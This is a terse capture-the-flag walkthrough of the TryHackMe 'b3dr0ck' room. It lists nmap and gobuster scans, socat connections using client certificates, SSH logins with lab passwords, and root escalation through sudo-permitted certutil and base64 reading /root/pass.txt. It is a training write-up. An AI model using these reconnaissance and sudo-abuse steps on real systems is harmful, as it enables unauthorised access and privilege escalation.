b3dr0ck
Room Link: https://tryhackme.com/room/b3dr0ck
Initial Scan
Kali
nmap -A $VICTIM
Scan all ports
Port 4040 & 54321 discovered
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
Kali
nmap -sC -sV -p- $VICTIMTCP/80 - HTTP
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txtTCP/4040 - HTTPS
TCP/9009 - HTTPS
TCP/54321 -
Kali
socat stdio ssl:$VICTIM:54321,cert=certficate,key=key,verify=0
TCP/22 - SSH
Kali
ssh barney@$VICTIM
Password: d1ad7c0a3805955a35eb260dab4180dd
Victim
sudo -l
sudo /usr/bin/certutil -a fred.csr.pem
TCP/54321 -
Kali
socat stdio ssl:$VICTIM:54321,cert=fred.certificate,key=fred.key,verify=0
TCP/22 - SSH
Kali
ssh fred@$VICTIM
Password: YabbaDabbaD0000!
Kali
sudo -l
sudo /usr/bin/base64 /root/pass.txt
CyberChef
CrackStation
su root
Password: flintstonesvitaminsLast updated